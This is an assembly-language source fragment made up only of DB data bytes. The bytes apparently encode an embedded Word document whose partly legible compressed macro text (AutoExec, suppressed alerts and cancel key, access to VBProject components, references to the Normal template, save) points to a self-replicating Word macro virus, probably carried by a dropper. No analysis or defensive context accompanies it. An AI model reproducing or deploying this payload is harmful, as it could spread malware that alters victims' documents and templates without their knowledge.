DB 02DH,000H,044H,000H,042H,054H,041H,000H,033H,002H,002H,02DH,002H,01AH,031H
DB 002H,00EH,032H,002H,014H,042H,000H,043H,000H,041H,002H,020H,02DH,045H,0EDH
DB 002H,004H,034H,002H,004H,035H,000H,035H,002H,022H,035H,002H,00AH,030H,002H
DB 038H,003H,004H,07DH,002H,04EH,00FH,003H,00FH,010H,0FFH,0FFH,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH
DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,0F7H,0F5H,00FH,010H,00FH,010H,0E7H,0B4H,003H
DB 002H,019H,0F3H,054H,0F3H,0B4H,0F3H,0B0H,0E3H,0FFH,031H,002H,014H,009H,002H
DB 004H,0E3H,0D0H,0F3H,030H,0F3H,088H,0DAH,0D6H,00DH,002H,010H,00EH,002H,004H
DB 0F3H,0E4H,039H,002H,008H,0F3H,0D4H,012H,002H,008H,0F3H,0BCH,014H,002H,008H
DB 015H,002H,004H,0F3H,0C0H,041H,0D5H,0F3H,0E4H,0FEH,0FFH,0FFH,0FFH,019H,002H
DB 010H,01AH,002H,004H,01BH,002H,004H,01CH,002H,004H,01DH,002H,004H,0F3H,05FH
DB 056H,0ABH,01FH,002H,008H,003H,020H,0FDH,002H,024H,022H,002H,00CH,028H,002H
DB 004H,003H,010H,025H,002H,008H,026H,002H,004H,027H,002H,004H,0AAH,0AAH,029H
DB 002H,004H,038H,002H,004H,02AH,002H,004H,02BH,002H,004H,02CH,002H,004H,02DH
DB 002H,004H,02EH,002H,004H,02FH,002H,004H,056H,0EDH,030H,002H,004H,003H,034H
DB 032H,002H,008H,033H,002H,004H,034H,002H,004H,035H,002H,004H,0F3H,094H,037H
DB 002H,008H,003H,01CH,003H,004H,0AAH,0F5H,03AH,002H,00CH,03BH,002H,004H,03CH
DB 002H,004H,03DH,002H,004H,0F3H,0ACH,03FH,002H,008H,040H,002H,004H,003H,020H
DB 002H,083H,00FH,003H,0FFH,07FH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,008H,010H,052H,004H,000H,000H,06FH,002H,002H,074H,000H
DB 020H,000H,045H,000H,06EH,000H,074H,000H,072H,000H,079H,01FH,086H,012H,016H
DB 005H,003H,023H,01CH,005H,00AH,009H,006H,04CH,002H,000H,000H,013H,0C8H,007H
DB 012H,016H,000H,005H,001H,007H,04DH,0D9H,00AH,023H,044H,006H,009H,002H,021H
DB 002H,01DH,0C0H,002H,004H,002H,003H,046H,002H,004H,000H,007H,020H,040H,0B3H
DB 092H,032H,0A0H,002H,059H,06FH,0BEH,001H,024H,002H,015H,0C0H,022H,021H,010H
DB 002H,008H,031H,000H,054H,000H,061H,000H,0E0H,0C1H,062H,000H,06CH,000H,065H
DB 002H,00EH,00FH,003H,00FH,010H,00FH,010H,000H,000H,00EH,000H,002H,008H,060H
DB 003H,068H,057H,010H,00FH,022H,00FH,010H,003H,010H,008H,002H,005H,0DAH,022H
DB 085H,086H,000H,000H,0F0H,057H,002H,0FEH,072H,000H,064H,004H,00FH,000H,044H
DB 002H,008H,063H,000H,075H,000H,06DH,002H,088H,013H,008H,002H,023H,004H,003H
DB 09CH,02CH,047H,000H,0EAH,0E1H,0C4H,002H,031H,0C8H,002H,004H,0D0H,002H,004H
DB 007H,064H,023H,03CH,003H,00CH,01AH,000H,002H,001H,033H,034H,003H,00CH,003H
DB 004H,063H,0D1H,004H,035H,00AH,005H,0F8H,055H,01AH,00FH,0D9H,004H,01EH,01EH
DB 016H,045H,005H,000H,053H,004H,076H,06DH,012H,006H,013H,07CH,0AAH,07AH,049H
DB 012H,086H,066H,002H,08CH,072H,002H,08AH,061H,012H,090H,069H,002H,00CH,06EH
DB 002H,032H,013H,02CH,002H,007H,00FH,003H,000H,0FEH,0F1H,028H,002H,080H,013H
DB 072H,033H,0BCH,00FH,080H,00FH,02DH,007H,010H,004H,04CH,004H,005H,000H,000H
DB 005H,00FH,0FAH,00FH,090H,00FH,090H,006H,090H,03BH,0D2H,013H,010H,003H,050H
DB 038H,002H,080H,003H,078H,007H,004H,00CH,083H,046H,002H,094H,000H,000H,023H
DB 03CH,0BCH,012H,030H,013H,034H,04BH,041H,003H,028H,006H,004H,080H,002H,008H
DB 080H,018H,002H,005H,000H,002H,080H,0CDH,000H,000H,0A0H,04DH,002H,0F8H,063H
DB 051H,01FH,022H,076H,06FH,000H,073H,003H,016H,000H,003H,034H,0C0H,002H,038H
DB 004H,00DH,00FH,005H,006H,010H,003H,0F0H,050H,029H,047H,0C1H,087H,014H,0F8H
DB 00EH,000H,001H,001H,001H,002H,018H,043H,09CH,043H,0A4H,002H,00BH,00FH,003H
DB 000H,080H,044H,003H,024H,078H,0E8H,060H,0C0H,0F9H,067H,004H,008H,056H,012H
DB 0F8H,043H,070H,003H,029H,056H,000H,042H,000H,041H,003H,009H,00FH,004H,000H
DB 0ACH,0FDH,030H,065H,003H,0D4H,007H,028H,0B8H,002H,094H,0F5H,003H,069H,00EH
DB 028H,008H,002H,0EAH,003H,028H,003H,004H,053H,034H,00EH,01FH,004H,00FH,088H
DB 007H,040H,06CH,00CH,004H,078H,0A0H,058H,060H,004H,008H,004H,015H,002H,005H
DB 003H,0C8H,054H,000H,068H,000H,069H,0FDH,0FFH,002H,0FCH,044H,012H,058H,02FH
DB 080H,002H,023H,004H,003H,053H,074H,004H,009H,006H,005H,00BH,0E8H,023H,080H
DB 053H,0A4H,002H,09FH,014H,010H,006H,023H,00FH,007H,0F9H,0FFH,00FH,010H,000H
DB 093H,053H,0E5H,002H,016H,003H,0D3H,003H,088H,033H,0BCH,023H,044H,023H,0CCH
DB 003H,01BH,003H,0CCH,003H,054H,003H,05CH,06FH,000H,067H,000H,0FDH,0B5H,012H
DB 0C3H,000H,06FH,000H,06BH,000H,013H,0E8H,067H,000H,053H,068H,023H,0F3H,06BH
DB 000H,020H,002H,080H,021H,002H,004H,063H,000H,023H,002H,008H,0FFH,0BFH,043H
DB 018H,06BH,000H,013H,07CH,063H,004H,06FH,000H,06BH,000H,063H,0A4H,06FH,000H
DB 067H,000H,063H,03CH,063H,0A4H,06FH,000H,06BH,000H,013H,0FCH,042H,002H,07CH
DB 06AH,055H,043H,002H,004H,044H,002H,004H,045H,002H,004H,043H,0B5H,047H,002H
DB 008H,048H,002H,004H,049H,002H,004H,04AH,002H,004H,04BH,0ABH,0AAH,002H,004H
DB 003H,0C4H,04DH,002H,008H,04EH,002H,004H,04FH,002H,004H,050H,002H,004H,051H
DB 002H,004H,052H,002H,004H,053H,002H,004H,0BAH,0AAH,054H,002H,004H,055H,002H
DB 004H,003H,028H,003H,004H,058H,002H,00CH,059H,002H,004H,05AH,002H,004H,05BH
DB 002H,004H,05CH,002H,004H,0FDH,00FH,003H,018H,05EH,006H,008H,023H,034H,00FH
DB 004H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 001H,016H,001H,000H,034H,0FFH,001H,0B6H,022H,03BH,001H,023H,00AH,002H,008H
DB 0FFH,0FFH,002H,09EH,004H,008H,005H,00AH,003H,00EH,00FH,004H,00FH,010H,00BH
DB 010H,023H,015H,0CFH,0EAH,023H,04DH,023H,049H,023H,045H,007H,071H,001H,001H
DB 023H,04FH,003H,00EH,078H,002H,02FH,0DEH,002H,004H,0F7H,022H,078H,033H,053H
DB 003H,014H,083H,0F4H,002H,00FH,032H,049H,000H,000H,094H,01EH,096H,052H,099H
DB 0FFH,0FFH,023H,00FH,088H,002H,015H,003H,034H,002H,007H,00FH,003H,06BH,067H
DB 009H,010H,003H,0A5H,013H,002H,070H,0D6H,002H,013H,003H,004H,0DFH,023H,0C5H
DB 004H,0BFH,002H,011H,000H,0DFH,002H,00AH,003H,008H,00CH,0FFH,087H,002H,008H
DB 003H,067H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,009H,010H,023H,0CCH,002H,000H,053H,04CH,003H,012H,029H,024H,053H,01EH
DB 053H,010H,008H,00AH,094H,005H,00AH,000H,000H,002H,03CH,005H,00AH,0FFH,0FFH
DB 015H,08DH,001H,000H,0A0H,08AH,04EH,000H,030H,000H,07BH,002H,004H,030H,002H
DB 004H,032H,002H,004H,039H,002H,004H,036H,000H,02DH,002H,006H,0F5H,000H,003H
DB 012H,030H,00CH,00AH,043H,006H,016H,009H,01EH,005H,024H,005H,006H,034H,000H
DB 036H,000H,07DH,000H,01DH,0C9H,060H,032H,0EDH,036H,002H,000H,0DFH,033H,0E1H
DB 013H,086H,001H,001H,053H,090H,002H,081H,023H,095H,003H,07BH,0FFH,0FFH,07DH
DB 086H,003H,0A7H,000H,012H,02DH,013H,035H,003H,004H,005H,016H,013H,065H,000H
DB 000H,033H,0BBH,033H,0A3H,00CH,011H,018H,002H,00BH,018H,0A7H,0FFH,00FH,00CH
DB 00BH,038H,003H,01CH,00CH,000H,053H,09DH,094H,003H,017H,004H,004H,093H,0B7H
DB 003H,018H,003H,004H,003H,011H,022H,081H,002H,007H,024H,07FH,0FFH,08FH,002H
DB 008H,00FH,01EH,003H,026H,00FH,014H,003H,014H,00BH,004H,002H,037H,004H,003H
DB 007H,014H,003H,00DH,007H,00CH,00FH,008H,002H,000H,070H,002H,01FH,0FEH,047H
DB 04DH,032H,0E8H,005H,01AH,002H,00DH,006H,0F0H,017H,077H,003H,012H,00FH,004H
DB 00FH,010H,00FH,010H,007H,010H,0FEH,0CAH,001H,002H,0EEH,022H,0F8H,0F7H,081H
DB 008H,000H,013H,064H,004H,016H,002H,00CH,023H,094H,024H,0CAH,002H,00CH,053H
DB 04DH,033H,024H,000H,002H,00CH,013H,018H,053H,005H,003H,00CH,0FFH,06EH,022H
DB 0F7H,012H,0C1H,002H,032H,002H,018H,043H,0B1H,043H,05DH,003H,018H,003H,030H
DB 090H,002H,017H,003H,00CH,013H,07EH,0A0H,006H,00CH,003H,018H,0C8H,051H,013H
DB 003H,00CH,080H,008H,000H,003H,060H,0D8H,002H,00CH,004H,002H,03CH,032H,055H
DB 000H,0E0H,002H,00CH,000H,080H,009H,047H,002H,003H,006H,002H,0DCH,005H,0E8H
DB 001H,001H,0F0H,002H,010H,08FH,004H,013H,04CH,000H,000H,0C1H,000H,01AH,002H
DB 001H,018H,013H,008H,0AFH,000H,020H,000H,01CH,002H,028H,000H,01EH,002H,002H
DB 01DH,002H,003H,020H,000H,022H,00AH,020H,002H,005H,012H,020H,004H,012H,0F7H
DB 000H,020H,000H,024H,002H,0F6H,000H,0A4H,032H,09EH,020H,000H,0A0H,060H,026H
DB 002H,021H,000H,028H,002H,004H,02AH,002H,004H,02CH,002H,08BH,000H,000H,004H
DB 018H,005H,01CH,024H,002H,000H,002H,007H,020H,025H,000H,02AH,002H,001H,000H
DB 021H,000H,02EH,002H,025H,000H,030H,002H,000H,008H,002H,000H,0AEH,000H,005H
DB 000H,027H,046H,041H,042H,049H,002H,008H,094H,000H,046H,000H,082H,051H,093H
DB 002H,07CH,067H,000H,05CH,000H,04DH,082H,06BH,007H,060H,0C0H,000H,02EH,0A2H
DB 081H,058H,002H,02CH,00BH,010H,016H,000H,043H,03AH,05CH,003H,02EH,02EH,053H
DB 052H,043H,022H,074H,007H,056H,021H,002H,056H,042H,040H,032H,030H,0A8H,002H
DB 001H,000H,032H,002H,02CH,003H,016H,042H,040H,034H,002H,000H,092H,0AFH,063H
DB 092H,027H,09BH,002H,054H,0E1H,000H,013H,04AH,06CH,000H,0FFH,0FFH,063H,077H
DB 003H,0F4H,013H,066H,001H,0B0H,0B1H,000H,041H,074H,074H,072H,000H,010H,069H
DB 062H,075H,074H,000H,065H,020H,056H,042H,05FH,04EH,061H,092H,0E3H,020H,03DH
DB 020H,008H,000H,022H,054H,068H,072H,078H,044H,06FH,063H,075H,06DH,065H,06EH
DB 010H,074H,022H,00DH,00AH,000H,000H,00AH,08CH,042H,061H,073H,001H,002H,08CH
DB 030H,07BH,030H,030H,030H,032H,030H,050H,000H,000H,039H,030H,036H,02DH,000H
DB 010H,030H,003H,008H,043H,007H,000H,014H,002H,012H,001H,000H,000H,024H,030H
DB 030H,034H,036H,07DH,001H,00DH,07CH,043H,072H,065H,061H,074H,061H,062H,000H
DB 000H,082H,06CH,001H,086H,046H,061H,06CH,073H,065H,00CH,05EH,000H,050H,072H
DB 065H,064H,000H,000H,065H,063H,06CH,061H,089H,000H,006H,049H,064H,000H,08BH
DB 054H,072H,075H,00DH,022H,000H,000H,040H,045H,078H,070H,06FH,073H,065H,014H
DB 01CH,054H,000H,065H,06DH,070H,06CH,061H,000H,000H,074H,065H,044H,030H,065H
DB 072H,069H,076H,002H,024H,011H,065H,043H,075H,0C0H,073H,000H,000H,074H,06FH
DB 06DH,069H,07AH,004H,088H,003H,032H,000H,053H,075H,062H,020H,041H,075H,000H
DB 000H,074H,06FH,000H,045H,078H,065H,063H,028H,029H,00DH,00AH,000H,04FH,06EH
DB 020H,045H,000H,000H,072H,072H,06FH,072H,000H,020H,047H,06FH,054H,06FH,020H
DB 045H,052H,004H,052H,04FH,000H,000H,080H,055H,050H,050H,04CH,049H,043H,000H
DB 041H,054H,049H,04FH,04EH,02EH,044H,049H,000H,000H,000H,053H,050H,04CH,041H
DB 059H,041H,04CH,045H,038H,052H,054H,053H,000H,055H,005H,000H,000H,034H,008H
DB 011H,045H,04EH,000H,041H,042H,04CH,045H,043H,041H,04EH,043H,020H,045H,000H
DB 000H,04CH,04BH,045H,059H,000H,012H,057H,044H,043H,000H,01BH,001H,00AH,044H
DB 00DH,00AH,000H,000H,046H,080H,02DH,049H,009H,080H,009H,031H,020H,080H,02FH
DB 04EH,04FH,052H,04DH,020H,000H,000H,041H,04CH,054H,045H,04DH,080H,029H,054H
DB 045H,000H,02EH,056H,042H,050H,052H,04FH,000H,000H,04AH,045H,004H,043H,054H
DB 080H,004H,043H,04FH,04DH,050H,04FH,000H,04EH,045H,04EH,000H,000H,054H,053H
DB 02EH,043H,04FH,000H,055H,04EH,054H,00DH,00AH,049H,066H,020H,011H,0A2H,000H
DB 000H,017H,028H,049H,029H,000H,019H,044H,045H,04DH,000H,04FH,044H,055H,04CH
DB 045H,02EH,004H,040H,04CH,049H,002H,026H,053H,028H,031H,02CH,020H,031H,002H
DB 029H,000H,03BH,022H,014H,0E4H,040H,000H,000H,022H,020H,054H,068H,065H,06EH
DB 0C9H,038H,04EH,080H,065H,078H,074H,020H,049H,00DH,000H,000H,00AH,063H,024H
DB 002H,049H,0C0H,026H,052H,054H,020H,028H,022H,043H,004H,03AH,05CH,008H,000H
DB 0C1H,013H,02EH,012H,0D9H,022H,003H,040H,04FH,04CH,00FH,053H,041H,056H,045H
DB 00DH,00AH,000H,000H,045H,001H,051H,03AH,080H,001H,06EH,064H,020H,040H,05BH
DB 00DH,000H,00AH,00DH,00AH,000H,002H,0D0H,0CFH,011H,0E0H,0A1H,0B1H,01AH,0E1H
DB 000H,00EH,001H,03EH,000H,003H,000H,0FEH,0FFH,046H,028H,009H,039H,05AH,002H
DB 020H,001H,0CCH,061H,072H,04EH,001H,000H,0FFH,016H,032H,004H,009H,002H,004H
DB 0E4H,004H,003H,0E2H,047H,049H,053H,066H,005H,000H,002H,000H,02CH,001H,02AH
DB 022H,06DH,047H,000H,07BH,032H,05FH,053H,00CH,053H,048H,03AH,08FH,034H,022H
DB 06DH,046H,05CH,03EH,003H,01AH,003H,004H,02DH,000H,05FH,048H,003H,016H,009H
DB 004H,055H,048H,023H,000H,033H,022H,085H,020H,002H,030H,000H,023H,000H,039H
DB 002H,004H,043H,000H,03AH,002H,062H,041H,000H,052H,000H,051H,000H,080H,082H
DB 055H,000H,049H,000H,056H,000H,04FH,022H,0DBH,020H,0B2H,05AH,045H,000H,020H
DB 000H,050H,002H,018H,0A8H,054H,04FH,000H,047H,002H,006H,041H,022H,0F3H,041H
DB 002H,01AH,05CH,000H,00FH,02CH,020H,002H,076H,04FH,002H,01EH,055H,0D5H,020H
DB 052H,0F2H,053H,002H,04CH,04DH,002H,046H,043H,002H,032H,003H,048H,04FH,000H
DB 046H,000H,054H,002H,048H,053H,000H,0AAH,08DH,048H,004H,038H,045H,002H,058H
DB 05CH,002H,064H,042H,002H,00EH,007H,008H,033H,002H,090H,033H,017H,044H,000H
DB 04CH,002H,002H,0AEH,0A2H,023H,002H,01EH,022H,0DCH,0C2H,058H,061H,0D2H,058H
DB 020H,0A2H,0E2H,061H,0A2H,062H,069H,000H,063H,002H,046H,046H,0A2H,068H,0A3H
DB 0D5H,022H,056H,002H,03CH,070H,000H,070H,002H,01EH,05FH,002H,02CH,003H,04AH
DB 05FH,006H,0A8H,04AH,012H,01AH,043H,002H,070H,012H,05CH,0FFH,06BH,00FH,003H
DB 00FH,010H,004H,010H,0A2H,080H,032H,073H,033H,06FH,005H,004H,004H,015H,00FH
DB 005H,00EH,010H,01BH,002H,010H,00CH,043H,0FCH,002H,008H,064H,07DH,0BFH,0A2H
DB 0FEH,072H,002H,008H,00FH,003H,00FH,010H,00FH,010H,007H,010H,008H,012H,0E2H
DB 005H,07AH,005H,006H,007H,018H,00FH,008H,00BH,010H,04CH,002H,00DH,03CH,0DEH
DB 07CH,002H,002H,005H,002H,003H,015H,09EH,007H,0F6H,077H,000H,06DH,002H,014H
DB 00FH,003H,00FH,010H,00BH,010H,014H,00FH,080H,00BH,01DH,0F7H,0F7H,00FH,00CH
DB 006H,010H,0C2H,080H,000H,0A3H,0D8H,003H,00FH,00DH,080H,003H,012H,00FH,004H
DB 00FH,010H,00DH,010H,010H,0D2H,080H,063H,06BH,063H,00FH,013H,002H,0D7H,04DH
DB 00DH,01EH,00FH,00EH,005H,010H,057H,002H,007H,051H,036H,027H,023H,016H,0E9H
DB 068H,073H,002H,01AH,009H,003H,020H,001H,03FH,03AH,030H,0F1H,06BH,022H,0F0H
DB 030H,000H,035H,03FH,03AH,034H,05AH,03FH,03AH,039H,034H,005H,00AH,037H,03AH
DB 038H,036H,03AH,034H,002H,036H,03BH,03EH,072H,044H,054H,000H,071H,022H,0B2H
DB 069H,000H,076H,022H,0A2H,073H,000H,020H,0F2H,094H,065H,002H,006H,050H,0E4H
DB 01CH,067H,0BDH,0A8H,002H,006H,061H,012H,09CH,023H,0C8H,063H,039H,003H,0B6H
DB 072H,004H,028H,06FH,000H,066H,052H,0FFH,020H,032H,072H,066H,002H,00AH,055H
DB 0D6H,003H,018H,065H,032H,040H,04FH,002H,00CH,066H,022H,05AH,063H,000H,003H
DB 00EH,063H,069H,057H,002H,022H,052H,032H,03AH,003H,07EH,06AH,0A5H,04FH,032H
DB 024H,042H,032H,0B8H,04DH,004H,022H,00DH,048H,057H,002H,056H,072H,002H,07CH
DB 020H,000H,003H,02AH,030H,002H,082H,060H,075H,04FH,000H,062H,000H,06AH,002H
DB 048H,063H,067H,020H,002H,03AH,069H,002H,010H,072H,0E2H,0B6H,0F3H,0AEH,019H
DB 02CH,000H,088H,0FFH,000H,0B8H,000H,01FH,02EH,030H,000H,034H,032H,098H,09DH
DB 0A6H,015H,00CH,003H,014H,04FH,068H,007H,01AH,005H,008H,017H,02EH,033H,0D6H
DB 057H,044H,043H,068H,003H,004H,045H,068H,057H,042H,01CH,04EH,002H,0CAH,04FH
DB 000H,057H,044H,04CH,053H,000H,059H,002H,008H,054H,055H,07BH,032H,0B8H,04DH
DB 002H,0FAH,053H,032H,0BCH,044H,002H,0ECH,04CH,002H,010H,003H,03CH,054H,002H
DB 0B2H,003H,0ECH,003H,0F4H,043H,08EH,041H,055H,02BH,012H,064H,074H,002H,0E4H
DB 06DH,002H,0C2H,074H,012H,000H,06FH,0F2H,0E0H,00BH,0C6H,0E0H,008H,0C6H,041H
DB 042H,078H,035H,000H,0AAH,06AH,031H,002H,0C4H,031H,0A2H,03CH,032H,012H,0F4H
DB 042H,012H,014H,035H,002H,0D2H,02DH,002H,016H,031H,002H,082H,005H,014H,043H
DB 0D5H,0D6H,022H,014H,044H,002H,01EH,034H,002H,02AH,034H,022H,01CH,003H,022H
DB 035H,002H,00CH,005H,0C8H,030H,0A2H,076H,023H,074H,0B3H,003H,0C2H,03FH,06AH
DB 003H,004H,00FH,0C6H,00FH,0C6H,003H,0C6H,013H,0B2H,045H,0AAH,06DH,000H,073H
DB 022H,030H,054H,002H,0ECH,044H,01FH,0B2H,012H,0E4H,074H,0BBH,051H,012H,0A0H
DB 009H,028H,020H,006H,068H,023H,00EH,01FH,0B4H,062H,024H,042H,01DH,0B4H,001H
DB 000H,0E4H,008H,0EEH,044H,002H,0BAH,032H,051H,06BH,002H,0E0H,039H,000H,037H
DB 014H,03AH,02DH,002H,0E0H,042H,004H,0E8H,00FH,0EEH,041H,002H,0DCH,02DH,002H
DB 004H,003H,0F0H,035H,0DDH,05FH,002H,036H,033H,002H,004H,023H,0CCH,005H,0F0H
DB 07DH,002H,0A6H,013H,078H,003H,0EAH,003H,004H,00FH,0EEH,005H,0EEH,015H,0AEH
DB 050H,012H,0B0H,056H,08DH,0FEH,052H,09EH,045H,002H,008H,00FH,0F2H,045H,000H
DB 058H,002H,082H,023H,062H,014H,023H,0D4H,02DH,0A4H,00FH,0F2H,02FH,0A6H,02FH
DB 0A6H,019H,0E0H,001H,000H,033H,0F5H,0E1H,02EH,045H,00DH,08FH,0E0H,01AH,010H
DB 085H,02EH,002H,060H,08CH,04DH,00BH,050H,055H,0B4H,000H,000H,01CH,038H,0E8H
DB 032H,002H,074H,046H,012H,006H,044H,032H,09CH,034H,062H,094H,02DH,002H,0DCH
DB 042H,055H,0EDH,022H,008H,041H,012H,0E0H,031H,002H,014H,031H,002H,0AEH,02DH
DB 002H,004H,044H,012H,024H,047H,006H,041H,062H,04CH,003H,0FCH,013H,010H,0DDH
DB 07AH,005H,018H,032H,01FH,0F4H,002H,04AH,07FH,022H,04FH,022H,0B4H,07FH,022H
DB 052H,002H,04AH,04DH,002H,004H,07FH,002H,077H,002H,003H,008H,046H,055H,0ABH
DB 022H,0FEH,043H,002H,07EH,05CH,022H,0E4H,046H,002H,09AH,049H,002H,05CH,017H
DB 040H,04FH,022H,08AH,037H,022H,02EH,044H,022H,0F4H,0BEH,05DH,04CH,012H,088H
DB 03FH,0E0H,023H,02EH,04BH,01AH,03FH,0E4H,065H,072H,022H,003H,024H,04CH,032H
DB 018H,02FH,030H,015H,044H,001H,052H,0EEH,003H,040H,0FDH,000H,004H,002H,000H
DB 000H,006H,0A2H,089H,008H,002H,008H,00AH,0D6H,00BH,003H,020H,0D3H,027H,0D5H
DB 062H,053H,08AH,003H,004H,0FFH,0A0H,0D3H,04BH,003H,008H,00FH,004H,00FH,010H
DB 00FH,010H,013H,0A8H,003H,052H,00BH,004H,094H,01EH,001H,000H,018H,032H,0DEH
DB 068H,002H,09EH,0AAH,000H,073H,012H,0A8H,06FH,002H,0AEH,075H,052H,014H,065H
DB 032H,0C2H,074H,000H,00AH,000H,031H,033H,036H,065H,020H,0BCH,064H,063H,039H
DB 031H,065H,092H,027H,02AH,044H,001H,011H,002H,099H,0F3H,04CH,004H,043H,002H
DB 0A9H,000H,0F3H,01AH,0F9H,0FFH,005H,068H,001H,001H,0B3H,0DDH,005H,00CH,00FH
DB 006H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,005H,010H,012H,027H,08CH,016H
DB 005H,016H,00FH,006H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H
DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,07FH,000H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00DH,010H,043H,040H,09EH,021H
DB 033H,0DBH,0D2H,011H,0BCH,0E0H,02AH,0A4H,044H,045H,053H,054H,025H,0AAH,023H
DB 078H,003H,026H,060H,022H,036H,080H,002H,004H,000H,0C2H,03BH,027H,000H,010H
DB 000H,0FFH,000H,0F0H,027H,003H,00DH,047H,000H,003H,080H,014H,000H,0FFH,003H
DB 001H,000H,045H,088H,02CH,06EH,064H,000H,032H,065H,005H,080H,012H,002H,00FH
DB 000H,000H,0C5H,0ABH,032H,0D2H,005H,004H,020H,000H,000H,03DH,024H,0D4H,017H
DB 000H,0B2H,00DH,005H,031H,002H,011H,0C2H,0CBH,000H,05FH,000H,004H,004H,020H
DB 001H,000H,0C3H,0D5H,000H,000H,008H,028H,060H,000H,002H,004H,010H,000H,000H
DB 049H,066H,000H,000H,085H,008H,01EH,04EH,0C2H,03AH,000H,000H,002H,023H,08AH
DB 008H,01EH,04FH,06EH,000H,000H,0B0H,000H,007H,04BH,0D2H,02DH,000H,000H,0B3H
DB 006H,02DH,000H,000H,011H,000H,0C3H,06EH,000H,000H,0B4H,008H,02DH,054H,06FH
DB 004H,004H,057H,06FH,072H,064H,0B5H,06BH,010H,000H,000H,000H,003H,004H,056H
DB 042H,041H,0F7H,0E2H,010H,000H,005H,004H,057H,069H,06EH,031H,008H,001H,036H
DB 0C1H,07EH,006H,00BH,033H,032H,007H,07FH,003H,01FH,04DH,061H,063H,0B3H,0B2H
DB 010H,000H,000H,004H,006H,004H,04EH,06FH,072H,06DH,061H,06CH,0DFH,0D8H,003H
DB 00CH,073H,074H,064H,06FH,06CH,000H,004H,065H,093H,060H,010H,000H,007H,000H
DB 04DH,053H,046H,002H,01AH,073H,043H,00FH,010H,000H,014H,008H,00CH,004H,0E2H
DB 032H,073H,0E6H,031H,074H,03CH,09EH,010H,000H,009H,012H,023H,0FFH,003H,004H
DB 000H,040H,002H,05FH,045H,076H,061H,06CH,075H,0D2H,0E0H,018H,0D9H,003H,040H
DB 04FH,066H,066H,069H,063H,065H,004H,000H,015H,075H,002H,040H,004H,04DH,0F3H
DB 064H,075H,06CH,06FH,031H,0D4H,012H,010H,000H,008H,00AH,000H,004H,0D3H,0E3H
DB 045H,0D2H,0E2H,0ECH,09CH,010H,000H,004H,004H,045H,052H,052H,04FH,051H,05BH
DB 0C0H,000H,010H,000H,00BH,000H,041H,050H,0D3H,0D8H,0D4H,0D7H,0A5H,02AH,010H
